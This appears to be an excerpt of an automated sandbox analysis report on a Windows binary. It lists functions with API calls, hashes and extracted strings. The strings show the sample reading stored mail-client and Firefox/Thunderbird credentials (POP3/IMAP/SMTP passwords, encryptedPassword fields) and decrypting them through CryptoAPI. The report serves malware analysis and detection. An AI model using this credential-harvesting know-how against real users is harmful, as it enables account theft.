                                          • Opcode Fuzzy Hash: 2ea5a109eb267fb6083926362ae3c8176b926bbef034cd1da8757df3be379db2
                                          • Instruction Fuzzy Hash: 76B012792108005FCF1807349C4904D35506F45631760073CF033C00F0D720CC60BA00
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions

                                          Function 004033E2, Relevance: 7.6, Strings: 6, Instructions: 61COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: PrivateProfileString_mbscmpstrlen
                                          • String ID: ESMTPPassword$ESMTPUsername$POP3Password$POP3Server$POP3Username$SMTPServer
                                          • API String ID: 3963849919-1658304561
                                          • Opcode ID: 2d5d1f6d072cf84e5318d5093311add326f10471678b07e4c74f475588d4acf4
                                          • Instruction ID: 1b90a5eb0bf433dfd26fdc49de6d86aad9c02d214cf5b02dd481862667588e5e
                                          • Opcode Fuzzy Hash: 2d5d1f6d072cf84e5318d5093311add326f10471678b07e4c74f475588d4acf4
                                          • Instruction Fuzzy Hash: EF21F47180151C6EDB51EB11DD82FEE777C9B44705F4004ABBA09B1092DBBC6BC68E59
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004016FC, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: ??2@??3@memcpymemset
                                          • String ID: E$ E$ E
                                          • API String ID: 1865533344-1090515111
                                          • Opcode ID: 9da058ee93427dafffafa38840fabb32167184d36f2f077627326be0874b02b0
                                          • Instruction ID: 87a0be596659d04b7e64c8373dbe8b7d58709088cb568d7826d55e868489c559
                                          • Opcode Fuzzy Hash: 9da058ee93427dafffafa38840fabb32167184d36f2f077627326be0874b02b0
                                          • Instruction Fuzzy Hash: 0E115A74900209EFCF119F90C905AAE3BB1AF08312F00806AFC156B2A2C7799911DFAA
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0044227B, Relevance: 191.1, APIs: 8, Strings: 101, Instructions: 307stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • strlen.MSVCRT ref: 0044269A
                                          • _strncoll.MSVCRT ref: 004426AA
                                          • memcpy.MSVCRT ref: 00442726
                                          • atoi.MSVCRT ref: 00442737
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000002,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00442763
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: ByteCharMultiWide_strncollatoimemcpystrlen
                                          • String ID: AElig;$Aacute;$Acirc;$Agrave;$Aring;$Atilde;$Auml;$Ccedil;$ETH;$Eacute;$Ecirc;$Egrave;$Euml;$Iacute;$Icirc;$Igrave;$Iuml;$Ntilde;$Oacute;$Ocirc;$Ograve;$Oslash;$Otilde;$Ouml;$THORN;$Uacute;$Ucirc;$Ugrave;$Uuml;$Yacute;$aacute;$acirc;$acute;$aelig;$agrave;$amp;$apos;$aring;$atilde;$auml;$brvbar;$ccedil;$cedil;$cent;$copy;$curren;$deg;$divide;$eacute;$ecirc;$egrave;$eth;$euml;$frac12;$frac14;$frac34;$gt;$iacute;$icirc;$iexcl;$igrave;$iquest;$iuml;$laquo;$lt;$macr;$micro;$middot;$nbsp;$not;$ntilde;$oacute;$ocirc;$ograve;$ordf;$ordm;$oslash;$otilde;$ouml;$para;$plusmn;$pound;$quot;$raquo;$reg;$sect;$shy;$sup1;$sup2;$sup3;$szlig;$thorn;$times;$uacute;$ucirc;$ugrave;$uml;$uuml;$yacute;$yen;$yuml;
                                          • API String ID: 1864335961-3210201812
                                          • Opcode ID: 80ec9a29ea78ec2cbe9852ea9064bf10950e9091ede64f5a1b804a11a303e8fe
                                          • Instruction ID: 53082eb74af2b51306e1b07bdc149dea26fd0daa9c3b29582cc647e8b6ddbc01
                                          • Opcode Fuzzy Hash: 80ec9a29ea78ec2cbe9852ea9064bf10950e9091ede64f5a1b804a11a303e8fe
                                          • Instruction Fuzzy Hash: 90F112B080625CDBFB61CF54D9897DEBBB0EB01308F5881CAD4597B251C7B81A89CF99
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0044315E, Relevance: 69.3, APIs: 23, Strings: 23, Instructions: 313stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: strcmp$_strcmpi$memcpystrlenstrtoul
                                          • String ID: Account_Name$IMAP$IMAP_Port$IMAP_Secure_Connection$IMAP_Server$IMAP_User_Name$NNTP$NNTP_Email_Address$NNTP_Port$NNTP_Secure_Connection$NNTP_Server$NNTP_User_Name$POP3$POP3_Port$POP3_Secure_Connection$POP3_Server$POP3_User_Name$SMTP$SMTP_Email_Address$SMTP_Port$SMTP_Secure_Connection$SMTP_Server$SMTP_User_Name
                                          • API String ID: 1714764973-479759155
                                          • Opcode ID: a22eaacac348120a4584acb678e178257747be7cf0bf62b2cbe4dd5676c6cf3b
                                          • Instruction ID: 5e0940cb4a553810ccd5eed58eee7b2aa7af7a3cc246567a3fd24b3687d2e464
                                          • Opcode Fuzzy Hash: a22eaacac348120a4584acb678e178257747be7cf0bf62b2cbe4dd5676c6cf3b
                                          • Instruction Fuzzy Hash: AD9191B260C7049AF628BB329D43B9B33D8AF50719F10043FF95AB61C2EE6DB905465D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040E417, Relevance: 68.7, APIs: 25, Strings: 14, Instructions: 449COMMON
                                          Download Yara Rule
                                          APIs
                                          • memset.MSVCRT ref: 0040E6BB
                                            • Part of subcall function 0040690E: memset.MSVCRT ref: 00406930
                                            • Part of subcall function 0040690E: strlen.MSVCRT ref: 0040693B
                                            • Part of subcall function 0040690E: strlen.MSVCRT ref: 00406949
                                          • memset.MSVCRT ref: 0040E70C
                                          • memset.MSVCRT ref: 0040E728
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,%@,000000FF,?,00000104,?,?,?,?,?,?,0040EC25,?,00000000), ref: 0040E73F
                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000104,00000000,00000000,?,?,?,?,?,?,0040EC25,?), ref: 0040E75E
                                          • memset.MSVCRT ref: 0040E7C0
                                          • memset.MSVCRT ref: 0040E7D5
                                          • _mbscpy.MSVCRT ref: 0040E83A
                                          • _mbscpy.MSVCRT ref: 0040E850
                                          • _mbscpy.MSVCRT ref: 0040E866
                                          • _mbscpy.MSVCRT ref: 0040E87C
                                          • _mbscpy.MSVCRT ref: 0040E892
                                          • _mbscpy.MSVCRT ref: 0040E8A8
                                          • memset.MSVCRT ref: 0040E8C2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: memset$_mbscpy$ByteCharMultiWidestrlen
                                          • String ID: $"$$$$$%@$+$,$/$8$:$e$imap://%s$mailbox://%s$smtp://%s
                                          • API String ID: 3137614212-1813914204
                                          • Opcode ID: 69a064d0c74a5f80a32c9514a74247ccae5cfcd5772a3df6081ef2e910daae95
                                          • Instruction ID: 60cbd65c12865ccb94f157c96bc1922d811664869268201cbad442dfa9876f55
                                          • Opcode Fuzzy Hash: 69a064d0c74a5f80a32c9514a74247ccae5cfcd5772a3df6081ef2e910daae95
                                          • Instruction Fuzzy Hash: A9228E218087DA9DDB31D6BC9C456CDBF646B16234F0803DAF1E8BB2D2D7344A46CB66
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040DA89, Relevance: 61.5, APIs: 21, Strings: 14, Instructions: 232stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: _strcmpi$strlen$_strncoll$atoimemset$memcpy
                                          • String ID: fullname$hostname$identities$mail.account.account$mail.identity$mail.server$port$server$signon.signonfilename$true$type$useSecAuth$useremail$username
                                          • API String ID: 594115653-593045482
                                          • Opcode ID: 02ac693aacd5f103a4b76259fedb339b3b15ca4c55630f2bd5c8a753d7842cac
                                          • Instruction ID: 1e907043fac54bf2e371806c1eb24ba38ca233ac5dd260cadef0f6990961d541
                                          • Opcode Fuzzy Hash: 02ac693aacd5f103a4b76259fedb339b3b15ca4c55630f2bd5c8a753d7842cac
                                          • Instruction Fuzzy Hash: 3C71D832804204AEFF14ABA1DD02B9E77B5DF91329F21406FF545B21C1EB7D9A18D64C
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040E070, Relevance: 54.5, APIs: 20, Strings: 11, Instructions: 279COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 0040690E: memset.MSVCRT ref: 00406930
                                            • Part of subcall function 0040690E: strlen.MSVCRT ref: 0040693B
                                            • Part of subcall function 0040690E: strlen.MSVCRT ref: 00406949
                                            • Part of subcall function 004086A5: GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,0040EC43,?,00000000,?,?,?,?,?,?), ref: 004086C3
                                            • Part of subcall function 004086A5: CloseHandle.KERNEL32(?,?), ref: 0040870D
                                            • Part of subcall function 00408763: _mbsicmp.MSVCRT ref: 0040879D
                                          • memset.MSVCRT ref: 0040E123
                                          • memset.MSVCRT ref: 0040E138
                                          • _mbscpy.MSVCRT ref: 0040E19F
                                          • _mbscpy.MSVCRT ref: 0040E1B5
                                          • _mbscpy.MSVCRT ref: 0040E1CB
                                          • _mbscpy.MSVCRT ref: 0040E1E1
                                          • _mbscpy.MSVCRT ref: 0040E1F7
                                          • _mbscpy.MSVCRT ref: 0040E20A
                                          • memset.MSVCRT ref: 0040E225
                                          • memset.MSVCRT ref: 0040E23C
                                            • Part of subcall function 00406582: memset.MSVCRT ref: 004065A3
                                            • Part of subcall function 00406582: memcmp.MSVCRT ref: 004065CD
                                          • memset.MSVCRT ref: 0040E29D
                                          • memset.MSVCRT ref: 0040E2B4
                                          • memset.MSVCRT ref: 0040E2CB
                                          • sprintf.MSVCRT ref: 0040E2E6
                                          • sprintf.MSVCRT ref: 0040E2FB
                                          • sprintf.MSVCRT ref: 0040E310
                                          • _strcmpi.MSVCRT ref: 0040E326
                                          • _strcmpi.MSVCRT ref: 0040E33F
                                          • _strcmpi.MSVCRT ref: 0040E358
                                          • _strcmpi.MSVCRT ref: 0040E374
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: memset$_mbscpy$_strcmpi$sprintf$strlen$CloseFileHandleSize_mbsicmpmemcmp
                                          • String ID: C@$encryptedPassword$encryptedUsername$hostname$httpRealm$imap://%s$logins$mailbox://%s$passwordField$smtp://%s$usernameField
                                          • API String ID: 4171719235-3249434271
                                          • Opcode ID: b0d5c0670ed8c74d0c8e3b60901706fc2ec35adaa3e3620046f1bbd10783a5e2
                                          • Instruction ID: 4eb083177fa9c3dcba641838e0e399a852ec85db15ddf69852980c8670b79128
                                          • Opcode Fuzzy Hash: b0d5c0670ed8c74d0c8e3b60901706fc2ec35adaa3e3620046f1bbd10783a5e2
                                          • Instruction Fuzzy Hash: EFA16672D04219AEDF10EBA1DC41ADE77BCAF44304F1044BFF645B7181DA38AA988F59
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040243C, Relevance: 45.6, APIs: 3, Strings: 23, Instructions: 132COMMON
                                          Download Yara Rule
                                          APIs
                                          • memset.MSVCRT ref: 004024E7
                                            • Part of subcall function 00410452: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C69,?,?,?,?,00401C69,?,?,?), ref: 0041046D
                                          • _mbscpy.MSVCRT ref: 00402525
                                          • _mbscpy.MSVCRT ref: 004025EF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: _mbscpy$QueryValuememset
                                          • String ID: HTTPMail$HTTPMail Port$HTTPMail Secure Connection$HTTPMail Server$HTTPMail User Name$IMAP$IMAP Port$IMAP Secure Connection$IMAP Server$IMAP User Name$POP3$POP3 Port$POP3 Secure Connection$POP3 Server$POP3 User Name$Password2$SMTP$SMTP Display Name$SMTP Email Address$SMTP Port$SMTP Secure Connection$SMTP Server$SMTP USer Name
                                          • API String ID: 168965057-606283353
                                          • Opcode ID: d04dcaea7970b63fee6828c7dcfe30098fc49b177350675b76886810d8c329c2
                                          • Instruction ID: 01ace8319ffdb9fe87aab8cc910760b0be55d28e69d7af66dfccc1b3ad16f9ad
                                          • Opcode Fuzzy Hash: d04dcaea7970b63fee6828c7dcfe30098fc49b177350675b76886810d8c329c2
                                          • Instruction Fuzzy Hash: 815163B540161CEBEF20DF91DC85ADD7BACAF04318F50846BFA08A6142D7BD9584CF98
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004027B0, Relevance: 45.6, APIs: 3, Strings: 23, Instructions: 122COMMON
                                          Download Yara Rule
                                          APIs
                                          • memset.MSVCRT ref: 0040285B
                                            • Part of subcall function 00402994: RegQueryValueExA.ADVAPI32(00000400,?,00000000,?,?,?), ref: 004029C5
                                          • _mbscpy.MSVCRT ref: 00402895
                                            • Part of subcall function 00402994: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004029F3
                                          • _mbscpy.MSVCRT ref: 0040296D
                                            • Part of subcall function 0041042B: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402928,?,?,?,?,00402928,?,?), ref: 0041044A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: QueryValue_mbscpy$ByteCharMultiWidememset
                                          • String ID: Display Name$Email$HTTP$HTTP Port$HTTP Server URL$HTTP User$HTTPMail Use SSL$IMAP$IMAP Port$IMAP Server$IMAP Use SPA$IMAP User$POP3$POP3 Port$POP3 Server$POP3 Use SPA$POP3 User$Password$SMTP$SMTP Port$SMTP Server$SMTP Use SSL$SMTP User
                                          • API String ID: 1497257669-167382505
                                          • Opcode ID: fb3ed3ae92ef97c750fd38775156bd4655232a824b152189a5320ea8a9642570
                                          • Instruction ID: 24fe9e335227be75b4da69fc4be99485a809f42695e36ab36f90f83f1315ab2f
                                          • Opcode Fuzzy Hash: fb3ed3ae92ef97c750fd38775156bd4655232a824b152189a5320ea8a9642570
                                          • Instruction Fuzzy Hash: 22514DB150060C9BEF25EF61DC85ADD7BA8FF04308F50802BF924661A2DBB99958CF48
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040F5B8, Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 220windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • EndDialog.USER32(?,?), ref: 0040F600
                                          • GetDlgItem.USER32(?,000003EA), ref: 0040F618
                                          • SendMessageA.USER32(00000000,000000B1,00000000,0000FFFF), ref: 0040F637
                                          • SendMessageA.USER32(?,00000301,00000000,00000000), ref: 0040F644
                                          • SendMessageA.USER32(?,000000B1,00000000,00000000), ref: 0040F64D
                                          • memset.MSVCRT ref: 0040F675
                                          • memset.MSVCRT ref: 0040F695
                                          • memset.MSVCRT ref: 0040F6B3
                                          • memset.MSVCRT ref: 0040F6CC
                                          • memset.MSVCRT ref: 0040F6EA
                                          • memset.MSVCRT ref: 0040F703
                                          • GetCurrentProcess.KERNEL32 ref: 0040F70B
                                          • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0040F730
                                          • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0040F766
                                          • memset.MSVCRT ref: 0040F7BD
                                          • GetCurrentProcessId.KERNEL32 ref: 0040F7CB
                                          • memcpy.MSVCRT ref: 0040F7FA
                                          • _mbscpy.MSVCRT ref: 0040F81C
                                          • sprintf.MSVCRT ref: 0040F887
                                          • SetDlgItemTextA.USER32(?,000003EA,?), ref: 0040F8A0
                                          • GetDlgItem.USER32(?,000003EA), ref: 0040F8AA
                                          • SetFocus.USER32(00000000), ref: 0040F8B1
                                          Strings
                                          • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s, xrefs: 0040F881
                                          • {Unknown}, xrefs: 0040F67A
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_mbscpymemcpysprintf
                                          • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s${Unknown}
                                          • API String ID: 1428123949-3474136107
                                          • Opcode ID: b9341adbc2cd016ad37feae7563ea95aa4c33f034ac246c3141dbd5b744c5ef9
                                          • Instruction ID: eaf6f4841f79e9ca67ab0c8a61f7093b44a411cbafad24e33deb6097971d8b5c
                                          • Opcode Fuzzy Hash: b9341adbc2cd016ad37feae7563ea95aa4c33f034ac246c3141dbd5b744c5ef9
                                          • Instruction Fuzzy Hash: 4271B576404344BFEB31ABA0DC41EDB7B9CFB94345F00443AF644A25A1DB399D18CB6A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00401060, Relevance: 39.2, APIs: 26, Instructions: 186COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetDlgItem.USER32(?,000003EC), ref: 004010BC
                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 004010CE
                                          • GetDlgItem.USER32(?,000003EE), ref: 00401103
                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 00401110
                                          • GetDlgItem.USER32(?,000003EC), ref: 0040113E
                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 00401150
                                          • LoadCursorA.USER32(00000067), ref: 0040115F
                                          • SetCursor.USER32(00000000,?,?), ref: 00401166
                                          • GetDlgItem.USER32(?,000003EE), ref: 00401186
                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 00401193
                                          • GetDlgItem.USER32(?,000003EC), ref: 004011AD
                                          • SetBkMode.GDI32(?,00000001), ref: 004011B9
                                          • SetTextColor.GDI32(?,00C00000), ref: 004011C7
                                          • GetSysColorBrush.USER32(0000000F), ref: 004011CF
                                          • GetDlgItem.USER32(?,000003EE), ref: 004011EF
                                          • EndDialog.USER32(?,00000001), ref: 0040121A
                                          • DeleteObject.GDI32(?), ref: 00401226
                                          • GetDlgItem.USER32(?,000003ED), ref: 0040124A
                                          • ShowWindow.USER32(00000000), ref: 00401253
                                          • GetDlgItem.USER32(?,000003EE), ref: 0040125F
                                          • ShowWindow.USER32(00000000), ref: 00401262
                                          • SetDlgItemTextA.USER32(?,000003EE,00451398), ref: 00401273
                                          • memset.MSVCRT ref: 0040128E
                                          • SetWindowTextA.USER32(?,00000000), ref: 004012AA
                                          • SetDlgItemTextA.USER32(?,000003EA,?), ref: 004012C2
                                          • SetDlgItemTextA.USER32(?,000003EC,?), ref: 004012D3
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObjectmemset
                                          • String ID:
                                          • API String ID: 2998058495-0
                                          • Opcode ID: 0f9c4242ba45eb06dd3dfa1dd6db45fade88f32ef90b46f4d12f3d9a9e08a6d1
                                          • Instruction ID: cf74e5707885198988a29297af0a26d915b41f86d4ff93bb74c60bb1bb3fb963
                                          • Opcode Fuzzy Hash: 0f9c4242ba45eb06dd3dfa1dd6db45fade88f32ef90b46f4d12f3d9a9e08a6d1
                                          • Instruction Fuzzy Hash: 04618B35800208EBDF12AFA0DD85BAE7FA5BB04305F1481B6F904BA2F2C7B59950DF58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004047C6, Relevance: 38.5, APIs: 11, Strings: 11, Instructions: 49libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • LoadLibraryA.KERNEL32(advapi32.dll,?,00404A6B,?,00404981,?,?,00000000,?,00000000,?), ref: 004047D5
                                          • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 004047E9
                                          • GetProcAddress.KERNEL32(0045175C,CryptReleaseContext), ref: 004047F5
                                          • GetProcAddress.KERNEL32(0045175C,CryptCreateHash), ref: 00404801
                                          • GetProcAddress.KERNEL32(0045175C,CryptGetHashParam), ref: 0040480D
                                          • GetProcAddress.KERNEL32(0045175C,CryptHashData), ref: 00404819
                                          • GetProcAddress.KERNEL32(0045175C,CryptDestroyHash), ref: 00404825
                                          • GetProcAddress.KERNEL32(0045175C,CryptDecrypt), ref: 00404831
                                          • GetProcAddress.KERNEL32(0045175C,CryptDeriveKey), ref: 0040483D
                                          • GetProcAddress.KERNEL32(0045175C,CryptImportKey), ref: 00404849
                                          • GetProcAddress.KERNEL32(0045175C,CryptDestroyKey), ref: 00404855
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: AddressProc$LibraryLoad
                                          • String ID: CryptAcquireContextA$CryptCreateHash$CryptDecrypt$CryptDeriveKey$CryptDestroyHash$CryptDestroyKey$CryptGetHashParam$CryptHashData$CryptImportKey$CryptReleaseContext$advapi32.dll
                                          • API String ID: 2238633743-192783356
                                          • Opcode ID: cdc1f63c0c232f946f357b8b2aefe836e2e50651c8dba3e6496bd37ee8642a43
                                          • Instruction ID: 96d911507a8a1b00aef88e3b883ab5eac538cf63a3166b36270edd586bbeed94
                                          • Opcode Fuzzy Hash: cdc1f63c0c232f946f357b8b2aefe836e2e50651c8dba3e6496bd37ee8642a43
                                          • Instruction Fuzzy Hash: A501C974940744AFDB31AF769C09E06BEF1EFA97003224D2EE2C553650D77AA010DE49
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040B94B, Relevance: 37.0, APIs: 17, Strings: 4, Instructions: 300windowregistrystringCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00408DE1: LoadMenuA.USER32(00000000), ref: 00408DE9
                                            • Part of subcall function 00408DE1: sprintf.MSVCRT ref: 00408E0C
                                          • SetMenu.USER32(?,00000000), ref: 0040BA7E
                                          • SendMessageA.USER32(00000000,00000404,00000001,?), ref: 0040BAB1
                                          • LoadImageA.USER32(00000068,00000000,00000000,00000000,00009060), ref: 0040BAC7
                                          • CreateWindowExA.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000), ref: 0040BB27
                                          • LoadIconA.USER32(00000066,00000000), ref: 0040BB96
                                          • _strcmpi.MSVCRT ref: 0040BBEE
                                          • RegDeleteKeyA.ADVAPI32(80000001,0044551F), ref: 0040BC03
                                          • SetFocus.USER32(?), ref: 0040BC29
                                          • GetFileAttributesA.KERNEL32(004518C0), ref: 0040BC42
                                          • GetTempPathA.KERNEL32(00000104,004518C0), ref: 0040BC52
                                          • strlen.MSVCRT ref: 0040BC59
                                          • strlen.MSVCRT ref: 0040BC67
                                          • RegisterClipboardFormatA.USER32(commdlg_FindReplace), ref: 0040BCC3
                                            • Part of subcall function 00404B82: strlen.MSVCRT ref: 00404B9F
                                            • Part of subcall function 00404B82: SendMessageA.USER32(00000000,0000101B,00000000,?), ref: 00404BC3
                                          • SendMessageA.USER32(?,00000404,00000002,?), ref: 0040BD0E
                                          • SendMessageA.USER32(?,00000401,00001001,00000000), ref: 0040BD21
                                          • memset.MSVCRT ref: 0040BD36
                                          • SetWindowTextA.USER32(?,?), ref: 0040BD5A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: MessageSend$Loadstrlen$MenuWindow$AttributesClipboardCreateDeleteFileFocusFormatIconImagePathRegisterTempText_strcmpimemsetsprintf
                                          • String ID: /noloadsettings$SysListView32$commdlg_FindReplace$report.html
                                          • API String ID: 2303586283-933021314
                                          • Opcode ID: bc2ea265da4b9d7fbf42eb82516b20c9e5d99f5c25abf20ff2f7a7fba55c6b61
                                          • Instruction ID: a3034197930a53117d85b49231bdaaa03d04473d70278c5121b5a691f959c143
                                          • Opcode Fuzzy Hash: bc2ea265da4b9d7fbf42eb82516b20c9e5d99f5c25abf20ff2f7a7fba55c6b61
                                          • Instruction Fuzzy Hash: 13C1E0B1644788FFEB16DF64CC45BDABBA5FF14304F00016AFA44AB292C7B59904CB99
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004109F8, Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 101COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: _mbscat$memsetsprintf$_mbscpy
                                          • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                          • API String ID: 633282248-1996832678
                                          • Opcode ID: d48ae4295fbb277336b7674ab4026529653ef1736987acc8de4e4bffa9c8da66
                                          • Instruction ID: 7c6bf41bc1280a1bc88d4c6d4cc59bc6a86d5934fc3475aca932ea250c86fdc0
                                          • Opcode Fuzzy Hash: d48ae4295fbb277336b7674ab4026529653ef1736987acc8de4e4bffa9c8da66
                                          • Instruction Fuzzy Hash: 5E31E7B2805324BEFB14EA54DD42EDEB76CAF11354F20415FF214A2182DBBC9ED48A9D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040A6AF, Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 182COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: memsetsprintf$_mbscpy$FileWrite_mbscatstrlen
                                          • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                          • API String ID: 710961058-601624466
                                          • Opcode ID: 6b5a2a585f50ca3eac413cecb2812d02d42192bb924b4e36303969acff340374
                                          • Instruction ID: 74eb9a4e80b6148bc8e6745fd37c56fddd23ac0c0a2d0b32ddfd32f18a43723b
                                          • Opcode Fuzzy Hash: 6b5a2a585f50ca3eac413cecb2812d02d42192bb924b4e36303969acff340374
                                          • Instruction Fuzzy Hash: BC61B232900214AFEF14EF64CC81EDE7B79EF05314F10419AF905AB1D2DB749A55CB55
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00441A6C, Relevance: 27.4, APIs: 7, Strings: 11, Instructions: 375COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: memcmp$memcpy
                                          • String ID: %s mode not allowed: %s$BINARY$access$cache$file:$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s$vfs
                                          • API String ID: 231171946-1411472696
                                          • Opcode ID: ee0957bba9a21b500f81e6c25a2f981e0bf1c959c719be955f11db3b2c6e13f4
                                          • Instruction ID: 52e3131474fa5b42b7a716d11f9a5693575ad96a685679239bae0d8a086cc604
                                          • Opcode Fuzzy Hash: ee0957bba9a21b500f81e6c25a2f981e0bf1c959c719be955f11db3b2c6e13f4
                                          • Instruction Fuzzy Hash: 6ED13571D40209AAFF24CF99C8807EFBBB1AF15349F24405FE84197361E3789AC68B59
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040C12B, Relevance: 26.4, APIs: 7, Strings: 8, Instructions: 110stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: _mbscpy$FileModuleNamePlacementWindow_mbscatmemsetstrrchr
                                          • String ID: .cfg$AddExportHeaderLine$General$MarkOddEvenRows$SaveFilterIndex$ShowGridLines$WinPos$lD
                                          • API String ID: 1012775001-1916105108
                                          • Opcode ID: 122b63003726a974bfadc130288c83bc1cbd12b8fd6105304b92718d22d06189
                                          • Instruction ID: 0f0ca2c9629047d536013ad0a00a476c63862c7e4230734d296e8a5f64e20069
                                          • Opcode Fuzzy Hash: 122b63003726a974bfadc130288c83bc1cbd12b8fd6105304b92718d22d06189
